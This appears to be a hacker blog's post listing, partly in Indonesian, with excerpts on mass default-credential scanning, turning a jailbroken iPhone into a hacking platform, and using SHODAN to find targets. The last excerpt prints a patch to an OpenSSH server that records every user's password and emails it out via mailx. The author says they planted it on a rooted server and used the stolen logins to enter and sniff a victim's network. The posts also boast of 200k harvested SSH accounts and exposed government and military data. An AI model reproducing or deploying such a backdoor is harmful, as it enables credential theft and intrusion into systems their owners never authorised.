We start to kill our boring time by scanning 223 x /8 IP Addresses on internet. Probing for SSH & Telnet that has default username/password. Guess what?! Ah, we don’t have to tell the result, do we? In order to know who owns the IP address, we create simple script to map IP ranges. Some of the result can be found...

Right now, so much kiddies like to show their ass off on the media. Breaking servers just to show they can break pretty lamme servers. Are we dead?! C’mon guys, don’t be kidding. Just little show off MIL, GOV, MIT and any others high profit organization data are ready for fun! Even more high profit organization on the risk! Yes we found them on single server, argh sorry can’t tell you what kind of server :p Do you know that we are always watching?! Hell, we get more than 200k SSH users at the last several years! Looks like we are dead now?! open your eyes, who owns who now dude?! fear...

Sementara banyak para 4l4y3rs yang hanya menggunakan hi-tech phone-nya untuk keperluan gaya, gaul dan agak gayus (sedikit dipaksain dan agak ga nyambung), kali saya ingin memperlihatkan penggunaan Iphone untuk keperluan yang jauh lebih berguna yaitu penetration testing. Setelah melakukan jailbreak, silahkan install OpenSSH, sehingga anda bisa mengakses console via iSSH atau ssh client lainnya. Elz:/ root# uname -msi Darwin iPhone3,1 N90AP Elz:/ root# ifconfig lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384 inet 127.0.0.1 netmask 0xff000000 pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450 inet 10.xx.xx.xx --> 10.xx.xx.xx netmask 0xffffffff pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024 pdp_ip2: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024 pdp_ip3: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024 en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500 inet 172.16.0.30 netmask 0xfffffe00 broadcast 172.16.1.255 ether 40:a6:d9:7f:d3:35 en1: flags=8822<BROADCAST,SMART,SIMPLEX,MULTICAST> mtu 1500 ether 40:a6:d9:7f:d3:38 Untuk melengkapi iphone anda dengan hacking tools yang diperlukan maka anda harus menggunakan software manager apt-get untuk menginstallnya. Installasi package manager apt-get bisa dilakukan dari Cydia, setelah sukses anda akan dengan mudah menginstall package-package yang anda butuhkan: Elz:/ root# apt-get install netcat Reading package lists... Done Building dependency tree Reading state information... Done The following NEW packages will be installed: netcat 0 upgraded, 1 newly installed, 0 to remove and 3 not upgraded. Need to get 19.9kB of archives. After this operation, 61.4kB of additional disk space will be used. Get:1 http://apt.saurik.com tangelo-3.7/main netcat 0.7.1-2 [19.9kB] Fetched 19.9kB in 14s (1365B/s) Selecting previously deselected package netcat. (Reading database ... 5402 files and directories currently installed.) Unpacking netcat (from .../netcat_0.7.1-2_iphoneos-arm.deb) ... Setting up netcat (0.7.1-2) ... Hampir semua tools semacam ettercap, nmap, dsniff bisa anda install dengan mudah layaknya menggunakan laptop atau pc biasa. Sedikit catatan untuk penginstallan metasploit framework3, anda disarankan untuk mengambil package ruby yang compatible dengan msf tersebut. Elz:/var/ root# wget http://plugin.name/apt.iwatcher.net/debs/-IzQTMa9kmCdKMwOcAhkeQ/ruby_1.8.6-p111-5_iphoneos-arm.deb Elz:/var/ root# wget http://plugin.name/apt.iwatcher.net/debs/IrGPuK1_wEgo1XNN9tf68g/rubygems_1.2.0-3_iphoneos-arm.deb Elz:/var/ root# dpkg -i ruby_1.8.6-p111-5_iphoneos-arm.deb Elz:/var/ root# dpkg -i rubygems_1.2.0-3_iphoneos-arm.deb Elz:/var/ root# wget http://updates.metasploit.com/data/releases/framework-3.5.0.tar.bz2 Elz:/var/ root# tar jxvf framework-3.5.0.tar.bz2 Elz:/var/ root# mv framework3 msf3 Elz:/var/msf3 root# svn update Elz:/var/msf3...

Another toys was born! SHODAN lets you find servers/ routers/ etc. by using the simple search bar up above. Most of the data in the index covers web servers at the moment, but there is some data on FTP, Telnet and SSH services as well. Interisting ketika membuka seclist dan membaca postingan ini. Ada yang menyebutnya kombinasi dari Google Hacking database dan another similiar project. Tapi lebih dari itu, searching target hacking pun sekarang jauh lebih mudah (bagi kalangan tertentu). Simple keyword seperti IIS 4.0 memberikan banyak hasil yang lebih bagus dari pencarian di google dengan metode yang spesifik seperti yang di terangkan oleh ihackstuff.com. Bahkan lebih jauh lagi, SHODAN bisa mencarikan anda router cisco yang berasal dari indonesia seperti ini. so, happy hacking and take care.. humm, i mean be...

Apakah tcpdump? tcpdump adlah slh satu program linux,yg berfungsi untuk menangkap aliran paket data dari eth0 eth1,yg lebih umum dikenal dengan Nm Sniffing Ok sedikit berbagi pengalamn tepatny kemarin ketika sy check email trnyata sdh ada bbrp log yg masuk dri hasil Backdorinf port 22 OpenSSH 4.7p1 yg sy infect ke sbuah server hasil rooting,ttg bgaiman cr backdooring itu sdh dijelaskn sblumnya oleh para Dedengkot2 disini..hehehe 😀 //logs di file + if((f=fopen(LOGZ,"a"))!=NULL){ + fprintf(f,"user:[email protected] --> %s:%s@%sn",authctxt->server_user,password,authctxt->host); + fclose(f); + } + //kirim ke server pake curl/mail terserah + //example pake 'mailx' + snprintf(logz,sizeof(logz),"tail -1 %s|mailx -s "[owned user]new fucked user" [cencored]@live.com",LOGZ); + system(logz); ... anda dpt membaca dr script di atas,styap ada yg melakukan koneksi ssh dr server itu kluar maupun stu localhost otomatis terkirim ke email sya 😀 ok lgkah awal sy login ke server hasil sniffed tsb, lsg aja [email protected]:/# cat etc/hosts 127.0.0.1 localhost server0 xx.xxx.xx.xxx rahasia.deh.id #client customer 192.168.90.4 client1 192.168.90.10 client2 192.168.90.15 client3 192.168.90.51 client4 192.168.90.22 client5 192.168.90.201 client6 Woow..keknya server warnet nih..ato kantor ,g tau dah..^^ trs ak liat trafikny,trnyata g bsa iftop,mrka pakai Nload hmm.. [email protected]:/# uname -a;cat etc/issue Linux ds6471 2.6.22-8-server #1 SMP Thu Jul 12 16:28:57 GMT 2007 i686 GNU/Linux Ubuntu 6.06 LTS n l pakai ubuntu..:D,g pake lm lsg aj [email protected]:/#apt-get install iftop okee sdh terinstall [email protected]:/#iftop -i eth1 -F 192.168.90.10/32 12.5Kb 25.0Kb 37.5Kb 50.0Kb 62.5Kb +------------------------------------------------------------------------------- 192.168.90.10 <=> bs2.ads.vip.tpc.yahoo.com 5.25Kb 4.03Kb 2.99Kb 192.168.90.10 <=> tx-in-f113.google.com 3.66Kb 4.02Kb 4.22Kb 192.168.90.10 <=> ns3.turbodns.co.uk 748b 1.29Kb 983b 192.168.90.10 <=> 194.14.236.50 1.22Kb 250b 267b 192.168.90.10 <=> server6614.dedicated.webf 0b 188b 67b 192.168.90.10 <=> ds6488.dedicated.turbodns 0b 188b 67b 192.168.90.10 <=> raucousdns.co.uk 0b 188b 67b 192.168.90.10 <=> ad1.vip.rm.jp1.yahoo.net 0b 188b 67b 192.168.90.10 <=> server6485.dedicated.webf 0b 188b 67b 192.168.90.10 <=> in2.msg.vip.mud.yahoo.com 94kb 188b 67b 192.168.90.10 <=> server6542.dedicated.webf 0b 141b 50b 192.168.90.10 <=> server6437.dedicated.webf 0b 125b 132b 192.168.90.10 <=> 239.255.2.2 0b 36b 13b 192.168.90.10 <=> server6577.dedicated.webf 0b 0b...